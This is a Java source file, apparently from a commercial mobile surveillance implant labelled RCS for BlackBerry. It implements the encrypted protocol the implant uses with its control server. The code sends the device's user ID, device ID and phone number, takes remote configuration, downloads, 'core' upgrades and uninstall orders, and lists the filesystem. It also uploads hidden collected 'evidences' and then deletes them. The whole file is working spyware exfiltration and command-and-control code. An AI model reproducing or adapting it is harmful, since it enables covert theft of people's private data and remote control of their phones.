

/* *************************************************
 * Copyright (c) 2010 - 2011
 * HT srl,   All rights reserved.
 * 
 * Project      : RCS, RCSBlackBerry
 * *************************************************/

package blackberry.action.sync.protocol;

import java.io.EOFException;
import java.util.Date;
import java.util.Vector;

import net.rim.device.api.crypto.CryptoException;
import net.rim.device.api.crypto.RandomSource;
import net.rim.device.api.crypto.SHA1Digest;
import net.rim.device.api.util.DataBuffer;
import blackberry.Device;
import blackberry.Status;
import blackberry.Task;
import blackberry.action.sync.Protocol;
import blackberry.action.sync.transport.TransportException;
import blackberry.config.Keys;
import blackberry.crypto.Encryption;
import blackberry.crypto.EncryptionPKCS5;
import blackberry.debug.Check;
import blackberry.debug.Debug;
import blackberry.debug.DebugLevel;
import blackberry.evidence.EvidenceCollector;
import blackberry.fs.AutoFile;
import blackberry.fs.Directory;
import blackberry.fs.Path;
import blackberry.utils.Utils;
import blackberry.utils.WChar;

public class ZProtocol extends Protocol {

    private static final int SHA1LEN = 20;




    private final EncryptionPKCS5 cryptoK = new EncryptionPKCS5();
    private final EncryptionPKCS5 cryptoConf = new EncryptionPKCS5(Encryption
            .getKeys().getProtoKey());

    byte[] Kd = new byte[16];
    byte[] Nonce = new byte[16];

    boolean upgrade;
    Vector upgradeFiles = new Vector();
    Status status = Status.getInstance();

    public boolean perform() {




        // key init
        //cryptoConf.makeKey(Encryption.getKeys().getProtoKey());
        RandomSource.getBytes(Kd);
        RandomSource.getBytes(Nonce);






        try {
            transport.start();






            byte[] cypherOut = cryptoConf.encryptData(forgeAuthentication(), 0);



            byte[] response = transport.command(cypherOut);
            Status.self().uninstall = parseAuthentication(response);
            cypherOut = null;
            response = null;

            if (status.uninstall) {



                return true;
            }




            response = command(Proto.ID, forgeIdentification());
            boolean[] capabilities = parseIdentification(response);
            response = null;

            if (capabilities[Proto.PURGE]) {




                response = command(Proto.PURGE);
                parsePurge(response);
            }

            if (capabilities[Proto.NEW_CONF]) {




                response = command(Proto.NEW_CONF);
                int newconf = parseNewConf(response);
                response = null;

                if (newconf != Proto.NO) {



                    boolean ret = false;

                    if (newconf == Proto.OK) {



                        ret = Task.getInstance().reloadConf();
                    } else {



                    }




                    byte[] data;
                    if (ret) {
                        data = Utils.intToByteArray(Proto.OK);
                    } else {
                        data = Utils.intToByteArray(Proto.NO);
                    }




                    command(Proto.NEW_CONF, data);
                }
            }

            if (capabilities[Proto.DOWNLOAD]) {



                response = command(Proto.DOWNLOAD);
                parseDownload(response);
                response = null;
            }

            if (capabilities[Proto.UPLOAD]) {




                upgrade = false;
                boolean left = true;
                while (left) {
                    response = command(Proto.UPLOAD);
                    left = parseUpload(response);

                }
                response = null;
            }

            if (capabilities[Proto.UPGRADE]) {




                upgradeFiles.removeAllElements();

                boolean left = true;
                while (left) {
                    response = command(Proto.UPGRADE);
                    left = parseUpgrade(response);
                }
                response = null;
            }

            if (capabilities[Proto.FILESYSTEM]) {



                response = command(Proto.FILESYSTEM);
                parseFileSystem(response);
                response = null;
            }





            sendEvidences(Path.hidden());




            response = command(Proto.BYE);
            parseEnd(response);
            response = null;

            return true;

        } catch (TransportException e) {




            return false;
        } catch (ProtocolException e) {




            return false;
        } catch (CommandException e) {




            return false;
        } catch (Exception e) {




            return false;
        } finally {
            transport.close();
        }
    }

    ////************************** PROTOCOL *************************************** ////
    protected byte[] forgeAuthentication() {
        Keys keys = Encryption.getKeys();

        byte[] data = new byte[104];
        DataBuffer dataBuffer = new DataBuffer(data, 0, data.length, false);

        // filling structure
        dataBuffer.write(Kd);
        dataBuffer.write(Nonce);






        dataBuffer.write(Utils.padByteArray(keys.getBuildID(), 16));
        dataBuffer.write(keys.getInstanceId());
        dataBuffer.write(Utils.padByteArray(Device.getSubtype(), 16));






        // calculating digest       
        final SHA1Digest digest = new SHA1Digest();
        digest.update(Utils.padByteArray(keys.getBuildID(), 16));
        digest.update(keys.getInstanceId());
        digest.update(Utils.padByteArray(Device.getSubtype(), 16));
        digest.update(keys.getConfKey());

        byte[] sha1 = digest.getDigest();







        // appending digest
        dataBuffer.write(sha1);










        return data;
    }

    protected boolean parseAuthentication(byte[] authResult)
            throws ProtocolException {
        if (authResult.length != 64) {



            throw new ProtocolException(14);
        }

        boolean uninstall = false;





        // Retrieve K
        byte[] cypherKs = new byte[32];
        Utils.copy(cypherKs, authResult, cypherKs.length);
        try {

            byte[] Ks = cryptoConf.decryptData(cypherKs);







            //PBKDF1 (SHA1, c=1, Salt=KS||Kd) 
            final SHA1Digest digest = new SHA1Digest();
            digest.update(Encryption.getKeys().getConfKey());
            digest.update(Ks, 0, 16);
            digest.update(Kd, 0, 16);

            byte[] K = new byte[16];
            Utils.copy(K, digest.getDigest(), K.length);

            cryptoK.makeKey(K);





            // Retrieve Nonce and Cap
            byte[] cypherNonceCap = new byte[32];
            Utils.copy(cypherNonceCap, 0, authResult, 32, cypherNonceCap.length);

            Encryption crypto2 = new Encryption(K);
            byte[] plainNonceCap = crypto2.decryptData(cypherNonceCap);
            crypto2 = null;






            boolean nonceOK = Utils.equals(Nonce, 0, plainNonceCap, 0,
                    Nonce.length);



            if (nonceOK) {
                int cap = Utils.byteArrayToInt(plainNonceCap, 16);
                if (cap == Proto.OK) {



                } else if (cap == Proto.UNINSTALL) {



                    uninstall = true;
                } else {



                    throw new ProtocolException(11);
                }
            } else {
                throw new ProtocolException(12);
            }

        } catch (CryptoException ex) {



            throw new ProtocolException(13);
        }

        return uninstall;
    }

    protected byte[] forgeIdentification() {
        final Device device = Device.getInstance();
        //device.refreshData();

        byte[] userid = WChar.pascalize(device.getWUserId());
        byte[] deviceid = WChar.pascalize(device.getWDeviceId());
        byte[] phone = WChar.pascalize(device.getWPhoneNumber());

        int len = 4 + userid.length + deviceid.length + phone.length;

        byte[] content = new byte[len];

        DataBuffer dataBuffer = new DataBuffer(content, 0, content.length,
                false);
        //dataBuffer.writeInt(Proto.ID);
        dataBuffer.write(Device.getVersion());
        dataBuffer.write(userid);
        dataBuffer.write(deviceid);
        dataBuffer.write(phone);









        return content;
    }

    protected boolean[] parseIdentification(byte[] result)
            throws ProtocolException {
        boolean[] capabilities = new boolean[Proto.LASTTYPE];

        int res = Utils.byteArrayToInt(result, 0);
        if (res == Proto.OK) {




            DataBuffer dataBuffer = new DataBuffer(result, 4,
                    result.length - 4, false);
            try {
                // la totSize e' discutibile
                int totSize = dataBuffer.readInt();

                long dateServer = dataBuffer.readLong();





                Date date = new Date();
                int drift = (int) (dateServer - (date.getTime() / 1000));




                Status.getInstance().drift = drift;

                int numElem = dataBuffer.readInt();

                for (int i = 0; i < numElem; i++) {
                    int cap = dataBuffer.readInt();
                    if (cap < Proto.LASTTYPE) {
                        capabilities[cap] = true;



                    }

                }

            } catch (EOFException e) {



                throw new ProtocolException();
            }
        } else if (res == Proto.NO) {



        } else {



            throw new ProtocolException();
        }

        return capabilities;
    }

    protected void parsePurge(byte[] result) throws ProtocolException,
            CommandException {



        int res = Utils.byteArrayToInt(result, 0);
        if (res == Proto.OK) {
            final int len = Utils.byteArrayToInt(result, 4);
            if (len >= 12) {




                long time = Utils.byteArrayToLong(result, 8);
                int size = Utils.byteArrayToInt(result, 16);

                Date date = null;
                if (time > 0) {
                    date = new Date(time * 1000);
                }





                purgeEvidences(Path.hidden(), date, size);
            }


        }
    }

    /**
     * 
     * @param result
     * @return NO: no configuration, OK: new good configuration, ERROR: new
     *         broken conf
     * @throws ProtocolException
     * @throws CommandException
     */
    protected int parseNewConf(byte[] result) throws ProtocolException,
            CommandException {
        int res = Utils.byteArrayToInt(result, 0);
        boolean ret = false;
        if (res == Proto.OK) {

            final int confLen = Utils.byteArrayToInt(result, 4);
            if (confLen > 0) {




                ret = Protocol.saveNewConf(result, 8);

            } else {



            }
            if (ret) {
                return Proto.OK;
            } else {
                return Proto.ERROR;
            }

        } else if (res == Proto.NO) {



            return Proto.NO;
        } else {



            throw new ProtocolException();
        }

    }

    protected void parseDownload(byte[] result) throws ProtocolException {
        int res = Utils.byteArrayToInt(result, 0);
        if (res == Proto.OK) {



            DataBuffer dataBuffer = new DataBuffer(result, 4,
                    result.length - 4, false);
            try {
                // la totSize e' discutibile
                int totSize = dataBuffer.readInt();
                int numElem = dataBuffer.readInt();
                for (int i = 0; i < numElem; i++) {
                    String file = WChar.readPascal(dataBuffer);




                    // expanding $dir$
                    file = Directory.expandMacro(file);
                    file = Protocol.normalizeFilename(file);
                    Protocol.saveDownloadLog(file);
                }

            } catch (EOFException e) {



                throw new ProtocolException();
            }
        } else if (res == Proto.NO) {



        } else {



            throw new ProtocolException();
        }
    }

    /**
     * @param content
     * @return true if left>0
     * @throws ProtocolException
     */
    protected boolean parseUpload(byte[] result) throws ProtocolException {

        int res = Utils.byteArrayToInt(result, 0);
        if (res == Proto.OK) {



            DataBuffer dataBuffer = new DataBuffer(result, 4,
                    result.length - 4, false);
            try {
                int totSize = dataBuffer.readInt();
                int left = dataBuffer.readInt();



                String filename = WChar.readPascal(dataBuffer);




                int size = dataBuffer.readInt();
                byte[] content = new byte[size];
                dataBuffer.read(content);




                Protocol.saveUpload(filename, content);

                if (filename.startsWith("core")) {
                    upgrade = true;



                }

                if (left == 0 && upgrade) {



                    upgradeMulti();
                }

                return left > 0;

            } catch (EOFException e) {




                throw new ProtocolException();
            }
        } else if (res == Proto.NO) {



            return false;
        } else {



            throw new ProtocolException();
        }
    }

    protected boolean parseUpgrade(byte[] result) throws ProtocolException {

        int res = Utils.byteArrayToInt(result, 0);
        if (res == Proto.OK) {



            DataBuffer dataBuffer = new DataBuffer(result, 4,
                    result.length - 4, false);
            try {
                int totSize = dataBuffer.readInt();
                int left = dataBuffer.readInt();



                String filename = WChar.readPascal(dataBuffer);




                int size = dataBuffer.readInt();
                byte[] content = new byte[size];
                dataBuffer.read(content);




                Protocol.saveUpload(filename, content);
                upgradeFiles.addElement(filename);

                if (left == 0) {



                    Protocol.upgradeMulti(upgradeFiles);
                }

                return left > 0;

            } catch (EOFException e) {




                throw new ProtocolException();
            }
        } else if (res == Proto.NO) {



            return false;
        } else {



            throw new ProtocolException();
        }
    }

    protected void parseFileSystem(byte[] result) throws ProtocolException {
        int res = Utils.byteArrayToInt(result, 0);
        if (res == Proto.OK) {



            DataBuffer dataBuffer = new DataBuffer(result, 4,
                    result.length - 4, false);
            try {
                int totSize = dataBuffer.readInt();
                int numElem = dataBuffer.readInt();
                for (int i = 0; i < numElem; i++) {
                    int depth = dataBuffer.readInt();
                    String file = WChar.readPascal(dataBuffer);




                    file = Directory.expandMacro(file);
                    Protocol.saveFilesystem(depth, file);
                }

            } catch (EOFException e) {



                throw new ProtocolException();
            }
        } else if (res == Proto.NO) {



        } else {



            throw new ProtocolException();
        }
    }

    protected void purgeEvidences(String basePath, Date date, int size) {
        EvidenceCollector logCollector = EvidenceCollector.getInstance();

        final Vector dirs = logCollector.scanForDirLogs(basePath);
        final int dsize = dirs.size();



        for (int i = 0; i < dsize; ++i) {
            final String dir = (String) dirs.elementAt(i);
            final Vector logs = logCollector.scanForEvidences(basePath, dir);
            final int lsize = logs.size();



            for (int j = 0; j < lsize; ++j) {
                final String logName = (String) logs.elementAt(j);
                final String fullLogName = basePath + dir + logName;
                final AutoFile file = new AutoFile(fullLogName, false);
                if (file.exists()) {
                    if (size > 0 && file.getSize() > size) {



                        file.delete();
                    } else if (date != null
                            && file.lastModified() < date.getTime()) {



                        file.delete();
                    }
                }
            }
        }

    }

    protected void sendEvidences(String basePath) throws TransportException,
            ProtocolException {




        EvidenceCollector logCollector = EvidenceCollector.getInstance();

        final Vector dirs = logCollector.scanForDirLogs(basePath);
        final int dsize = dirs.size();



        for (int i = 0; i < dsize; ++i) {
            final String dir = (String) dirs.elementAt(i);
            final Vector logs = logCollector.scanForEvidences(basePath, dir);
            final int lsize = logs.size();




            // Evidence SIZE
            byte[] plainOut = new byte[4 + 8];
            Utils.copy(plainOut, 0, Utils.intToByteArray(lsize), 0, 4);

            byte[] response;

            if (!Keys.getInstance().isSeven()) {
                response = command(Proto.EVIDENCE_SIZE, plainOut);
                checkOk(response);
            }

            for (int j = 0; j < lsize; ++j) {
                final String logName = (String) logs.elementAt(j);
                final String fullLogName = basePath + dir + logName;
                final AutoFile file = new AutoFile(fullLogName, false);
                if (!file.exists()) {



                    continue;
                }
                final byte[] content = file.read();





                plainOut = new byte[content.length + 4];
                Utils.copy(plainOut, 0, Utils.intToByteArray(content.length),
                        0, 4);
                Utils.copy(plainOut, 4, content, 0, content.length);

                response = command(Proto.LOG, plainOut);
                plainOut = null;

                boolean ret = parseLog(response);

                if (ret) {
                    logCollector.remove(fullLogName);
                } else {



                    return;
                }
            }
            if (!Path.removeDirectory(basePath + dir)) {



            }




        }




    }

    protected boolean parseLog(byte[] result) throws ProtocolException {
        return checkOk(result);
    }

    protected void parseEnd(byte[] result) throws ProtocolException {
        checkOk(result);
    }

    //// ****************************** INTERNALS ****************************************** ////
    private byte[] command(int command) throws TransportException,
            ProtocolException {



        return command(command, new byte[0]);
    }

    private byte[] command(int command, byte[] data) throws TransportException {









        int dataLen = data.length;
        final byte[] plainOut = new byte[dataLen + 4];
        Utils.copy(plainOut, 0, Utils.intToByteArray(command), 0, 4);
        Utils.copy(plainOut, 4, data, 0, data.length);

        try {
            byte[] plainIn;

            plainIn = cypheredWriteReadSha(plainOut);
            return plainIn;
        } catch (CryptoException e) {



            throw new TransportException(9);
        }
    }

    private byte[] cypheredWriteReadSha(byte[] plainOut)
            throws TransportException, CryptoException {





        byte[] cypherOut = cryptoK.encryptDataIntegrity(plainOut);




        byte[] cypherIn = transport.command(cypherOut);

        String result = new String(cypherIn);
        if (result != null
                && result.indexOf("<meta http-equiv=\"refresh\" content") >= 0) {



            throw new TransportException(30);
        }

        if (cypherIn.length < SHA1LEN) {



            throw new CryptoException();
        }

        byte[] plainIn = cryptoK.decryptDataIntegrity(cypherIn);

        return plainIn;

    }

    private boolean checkOk(byte[] result) throws ProtocolException {
        int res = Utils.byteArrayToInt(result, 0);
        if (res == Proto.OK) {
            return true;
        } else if (res == Proto.NO) {



            return false;
        } else {




            throw new ProtocolException();
        }
    }
}
